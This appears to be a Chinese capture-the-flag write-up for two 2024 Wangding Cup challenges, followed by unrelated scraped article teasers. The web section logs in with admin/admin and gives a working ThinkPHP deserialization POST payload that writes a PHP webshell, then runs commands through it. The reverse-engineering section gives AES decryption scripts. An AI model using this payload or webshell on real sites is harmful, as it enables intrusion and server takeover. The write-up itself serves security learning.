2024网鼎杯web1+re2 wp
这两道题属于比较简单的,顺道说一下,今年的题有点抽象,web不是misc,re不是web的,也有可能时代在进步,现在要求全栈✌了吧
web1
最开始被强网的小浣熊带偏思路了,进来疯狂找sql注入,结果后台弱口令一试,
admin/admin
找了一堆POC,都打不通,进到后台试了半天文件上传也不行,最后只能针对cms版本进行攻击,找到了
https://cn-sec.com/archives/2640154.html文章,照着文章里的方法打就好了:
进左侧最下面的功能地图把栏目字段启用
POST /login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn title=poc3&name=poc3&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99
之后会新建一个poc3的字段,要记住这个字段的ID
然后打POC:
POST /login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn title=poc3&name=poc3&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=545&old_name=poc3&dtype[]=region
完事之后访问/login.php?m=admin&c=Field&a=channel_edit&channel_id=-99&id=545&_ajax=1路径,返回500
之后就getshell了,
/a.php617ac73525b333bea4ac35a717dd8b0a.php?_=system('cat /f*');
Re2
拖到jar反编译工具里,发现该处存在密钥和加密方法提示(AES):
接下来就是找密文,最开始找错了:
找到这,结果出来一堆java的类名,翻了下下面的类,找到了这块:
正则提取密文
import re# 读取文件内容with open("pwd.txt", "r", encoding="utf-8") as file:content = file.read()# 使用正则表达式提取所有括号内的内容matches = re.findall(r'\("([^"]+)"\)', content)# 打印或保存结果for match in matches:print(match)with open("extracted_content.txt", "w", encoding="utf-8") as output_file:for match in matches:output_file.write(match + "\n\n")直接GPT:
直接跑
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64# 密钥key = b'Y4SuperSecretKey'# 新密文列表ciphertexts = ['lD0pdU19mlA1xzNMZScMow==','vHTdmhywhmrERttY0v8WPA==','wOd4I7sVhw5HkgZMqTQlaA==','yV6xw9+tYxleD0h9egW2/XNXXL+1+pHUnuP+3m8ii1TeCMSJTegZd2igKpl+ap480ZRD/zkyXFtgSjExqvp5RTM5rjfOaEyoSArhtwuiS5U=','edT1iLMQCSvyHMUjip/M/A==','vHTdmhywhmrERttY0v8WPA==','wOd4I7sVhw5HkgZMqTQlaA==','xkXC55umWZBHWtL+x1dCCw==','uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo=','vHTdmhywhmrERttY0v8WPA==','BLYz3Sg6p3/X/BPYNW1L7FPYr0DwjapP8ge2BnUIVgk=','uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo=','3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7','yV6xw9+tYxleD0h9egW2/XSxK49PPZReLv9k58hqjT8=','1sth17wAFRt4+wAGPDITmg==','yV6xw9+tYxleD0h9egW2/XnNOj+AgvjLs2pu7dXzqrI=','Anj05GN/w2zBXhTp7riKrGXt8cugU0ZLiec1Gs+d1JsPe9kdfQpqBwV8tlru4DIUbg2ym6/BKkXTIkIAsDbA9g==','nG1R4Vi6NnBcBZ/yoHLWrQ==','aa5CJ5IF6MOG2H2+e1Wdhg==','KYLTetODpmvJ6F1dm/8ghQ==','KYLTetODpmvJ6F1dm/8ghQ==','vNXU4qrC9TvFzpRv4tbSsJW9UbGnp+utRSzGdevVAiG0wps8qiqPXXoCmmnIex25','KYLTetODpmvJ6F1dm/8ghQ==','vNXU4qrC9TvFzpRv4tbSsJW9UbGnp+utRSzGdevVAiG0wps8qiqPXXoCmmnIex25','LUj6lY0pyGsgf7h8uGlrUTP24ysker1No7mzBIAUHjcwsEmlkBNavkjjdNx7605ybDccQ/I5izOOjOSSYUbIMA==','uX4UoCpC1vhwr9Qjgpu31uIMLuC9MMTFZdoHUgTrXfo=','FHbZr6+qgY3p8S52uoSwU+rzLJu/BapSVDBVcsY//3k=','hllzo1U5TtIPfKWnxzEkWKPnX8SgrjiSIMuSly1LX78=','3EqYg7luQqWh5PuOtpGw4LUslS/TdDl5fRE1R6o557EUbcQFc0Ub6IFcpGpp/xh7','+gvewj5POa93RqmusJXQ4A==','YwDUGijDV5zY3M45IJyypg=='
]# 创建AES解密器cipher = AES.new(key, AES.MODE_ECB)# 解密所有密文for ct in ciphertexts:ciphertext = base64.b64decode(ct)try:decrypted = unpad(cipher.decrypt(ciphertext), AES.block_size)print(decrypted.decode('utf-8'))except Exception as e:print(f"解密失败: {ct}, 错误: {e}") 
相关文章:
2024网鼎杯web1+re2 wp
这两道题属于比较简单的,顺道说一下,今年的题有点抽象,web不是misc,re不是web的,也有可能时代在进步,现在要求全栈✌了吧 web1 最开始被强网的小浣熊带偏思路了,进来疯狂找sql注入,…...
Python 自动化运维:安全与合规最佳实践
Python 自动化运维:安全与合规最佳实践 目录 🔒 Python安全编程实践与最佳实践🔑 使用Hashlib与Cryptography进行数据加密📊 安全审计与合规检查的重要性🔍 处理敏感数据与隐私保护的方法 1. 🔒 Python安…...
I2S、PDM、PCM、TDM、DSM、DCODEC、VAD、SPDIF
I2S (Inter-IC Sound) 用途: 一种用于芯片之间传输音频数据的串行总线标准。特点: 常用于高质量音频设备,如DAC、ADC和音频编解码器。I2S主要传输PCM格式的音频数据。PDM (Pulse Density Modulation) 用途: 主要用于数字麦克风等设备,以简化硬件接口。特点: 使用脉冲密度来编…...
关于我的编程语言——C/C++——第四篇(深入1)
(叠甲:如有侵权请联系,内容都是自己学习的总结,一定不全面,仅当互相交流(轻点骂)我也只是站在巨人肩膀上的一个小卡拉米,已老实,求放过) 字符类型介绍 char…...
2025年上半年软考高级科目有哪些?附选科指南
新手在准备报考软考时,都会遇到这样的一个问题——科目这么多,我适合考什么?2025上半年软考高级有哪些科目可以报考?要想知道自己适合报什么科目,就需要了解每个科目是什么,考什么等一系列的问题࿰…...
线上查企业该用哪家平台?
在销售领域,经常会遇到电话接通率低的问题。这可能是因为许多电话号码来源于某些商业信息平台,这些号码可能已经被代账公司使用,或者已经被同行业多次联系过,导致接通率不高。为了解决这一问题,可以采用数据过滤服务&a…...
Metrix:实现CI服务器上的DORA指标自动化计算
本文还有配套的精品资源,点击获取 简介:Metrix项目是一个Go语言编写的工具,旨在自动化计算DevOps效能的关键指标——DORA指标,这些指标包括部署频率、前置时间、平均恢复时间和变更失败率。它通过集成到CI服务器如Jenkins或GitH…...
【STL_list 模拟】——打造属于自己的高效链表容器
一、list节点 list是一个双向循环带头的链表,所以链表节点结构如下: template<class T>struct ListNode{T val;ListNode* next;ListNode* prve;ListNode(int x){val x;next prve this;}};二、list迭代器 2.1、list迭代器与vector迭代器区别…...
Java 基础教学:高级特性与实战-集合框架
Java 集合框架提供了一套性能优良、使用方便的接口和类,用于存储和操作群组数据。最常用的集合接口有 List、Set 和 Map。 List List 接口可以存储一系列有序的元素,并且可以包含重复的元素。List 的实现类常用的有 ArrayList 和 LinkedList。 ArrayL…...
单片机原理及应用笔记:C51数组与项目实践
作者介绍 刘滋瑞,男,银川科技学院计算机与人工智能学院,2022级计算机与科学技术8班本科生,单片机原理及应用课程第九组。 指导老师:王兴泽 电子邮箱:602054774qq.com 前言 本篇文章是参考《单片机原理…...
综合项目--博客
一。基础配置: 1.配置主机名,静态IP地址 2.开启防火墙配置 3.部分开启selinux并且配置 4.服务器之间使用同ntp.aliyun.com进行世家能同步 5.服务器之间实现SSH绵密登陆 二。业务需求 1.Sever-NFS-DNS主机配置NFS服务器,将博客网站资源…...
ARM64的Mac Node.js前置工作,nvm在线安装
1,通过 终端 ping raw.githubusercontent.com 获取到ip地址185.199.110.133 2,终端输入sudo vi /etc/hosts,打开hosts文件 3,在最后添加 185.199.110.133 raw.githubusercontent.com 保存后退出 3.1,清除环境 完全…...
C++《list的模拟实现》
在上一篇C《list》专题当中我们了解了STL当中list类当中的各个成员函数该如何使用,接下来在本篇当中我们将试着模拟实现list,在本篇当中我们将通过模拟实现list过程中深入理解list迭代器和之前学习的vector和string迭代器的不同,接下来就开始…...
Kubernetes的概述与架构
Kubernetes 的概述 Kubernetes 是一个可移植、可扩展的开源平台,用于管理容器化的工作负载和服务,方便进行声明式配置和自动化。Kubernetes 拥有一个庞大且快速增长的生态系统,其服务、支持和工具的使用范围广泛。 Kubernetes 这个名字源于…...
Elasticsearch实战应用:构建高效的全文搜索引擎
Elasticsearch实战应用:构建高效的全文搜索引擎 在当今信息爆炸的时代,如何快速、准确地从海量数据中检索出所需信息成为了企业和开发者面临的重要挑战。Elasticsearch作为一款开源的分布式搜索引擎,凭借其强大的全文搜索、实时分析和可扩展…...
达梦数据库和人大金仓数据库对数据库的运行查看情况
1、查看服务器自身资源使用情况 查看内存: free -g 查看整体负载: top 查看磁盘io : iostat -d -x 1 2、查看数据库占用服务器内存情况,登录DM管理工具,达梦数据库使用的内存大致等于 BUFFER MPOOL,对应的 SQL 语句为:…...
Spring Boot解决 406 错误之返回对象缺少Getter/Setter方法引发的问题
目录 前言1. 问题背景2. 问题分析2.1 检查返回对象 3. 解决方案3.1 确保Controller返回Result类型3.2 测试接口响应 4. 原理探讨5. 常见问题排查与优化建议结语 前言 在Spring Boot开发中,接口请求返回数据是系统交互的重要环节,尤其在开发RESTful风格的…...
Automa入门教程详解(Automa工作流概述)
一、什么是工作流? 工作流其实就是一组功能模块,通过彼此的连接来完成一系列的自动化操作流程。你可以把它理解为一个流程图,系统会根据你设置的顺序,从触发块开始,一步一步地执行,直到最后一个模块。这让…...
Python并发编程库:Asyncio的异步编程实战
Python并发编程库:Asyncio的异步编程实战 在现代应用中,并发和高效的I/O处理是影响系统性能的关键因素之一。Python的asyncio库是专为异步编程设计的模块,提供了一种更加高效、易读的并发编程方式,适用于处理大量的I/O密集型任务…...
vueui vxe-form 分享实现表单项的联动禁用,配置式表单方式的用法
官网文档:https:/vxeui.com 实现表单项的联动禁用 在使用 vxe-form 时,有时候需要将表单项直接进行关联操作,比如某一项选择后,另外一项设置为禁用状态不可选择,使用插槽的话神容易实现,本章是分享配置式的…...
供应SW1655集成功率管的高频率、高性能同步整流
概述 SW1655 是一款集成 N 沟道 MOSFET 的高频率、高性能同步整流功率开关。针对离线式反激 变换器的副边同步整流应用,替代肖特基整流二极管,可以显著提高系统效率的同时,实现高集 成度与高功率密度。 SW1655 具有 VCC 自供电功能&#…...
电动机出现故障后怎么处理?
在工业生产中,电动机作为重要的驱动设备,其运行状态直接关系到生产线的效率和稳定性。然而,由于各种因素的影响,电动机在运行过程中可能会出现多种故障。那么,电动机出现故障后怎么处理? 一、电动机在工业…...
练习LabVIEW第四十题
学习目标: 用labvIEW做一个循环闪烁指示灯,要能够在前面板调节周期和占空比。 开始编写: 前面板 一个布尔指示灯一维数组,两个数值输入控件; 程序框图 添加一个while循环,循环内添加初始化数组&…...
蓝牙BLE开发——红米手机无法搜索蓝牙设备?
解决 红米手机,无法搜索附近蓝牙设备 具体型号当时忘记查看了,如果你遇到有以下选项,记得打开~ 设置权限...
UE5.4 PCG Layered Biomes插件
B站学习链接 官方文档 一、PCGSpawn Preset:负责管理PCG要用到的植被资产有哪些 二、BiomesSettings:设置要使用的植被资产Layer、Spawn参数 1.高度Layer参数: 2.地形Layer:我这里用地形样条线绘制了一块地形Layer 绘制点和…...
搭建你的私人云盘:使用File Browser与cpolar实现公网传输文件
文章目录 前言1.下载安装File Browser2.启动访问File Browser3.安装cpolar内网穿透3.1 注册账号3.2 下载cpolar客户端3.3 登录cpolar web ui管理界面3.4 创建公网地址 4.固定公网地址访问 前言 File Browser是一个开源的文件管理器和文件共享工具,它可以帮助用户轻…...
QT/QT QUICK与前端WEB开发的区别
开发框架与目标: QT/QT QUICK:跨平台应用程序开发框架,用于创建图形用户界面(GUI),特别适用于移动和嵌入式设备。前端WEB开发:主要关注Web应用的用户界面,使用HTML、CSS、JavaScript等技术。…...
Python+Playwright(Nuitka、Pyinstaller打包)
安装驱动 playwright install # 这个安装所有默认的浏览器 playwright install chromium # 一般只装这一个浏览器就够了,要是装另外两个浏览器,后面的参数名可以修改查看各个驱动的位置 playwright install --dry-run创建打包目录 在运行的包里面…...
2024年前三季度币安、OKX等五大交易所上币表现分析
随着加密市场竞争的加剧,头部交易所逐渐在上币策略、代币选择、交易活跃度等方面采取了不同的应对策略。Animoca Digital Research近期发布的一份报告,通过对币安、OKX、Bitget、KuCoin和Bybit五大交易所2024年前三季度的上币情况进行了详细分析。本文将…...
Go语言sync.WaitGroup与errgroup.Group用法详解
errgroup.Group 和 sync.WaitGroup 的主要区别在于它们的错误处理和协程管理方式。 errgroup.Group 专为并发操作中的错误捕获设计,任意goroutine返回错误时,会立即终止其他goroutine的执行。 而 sync.WaitGroup 主要用于等待多个 goroutine 完成&…...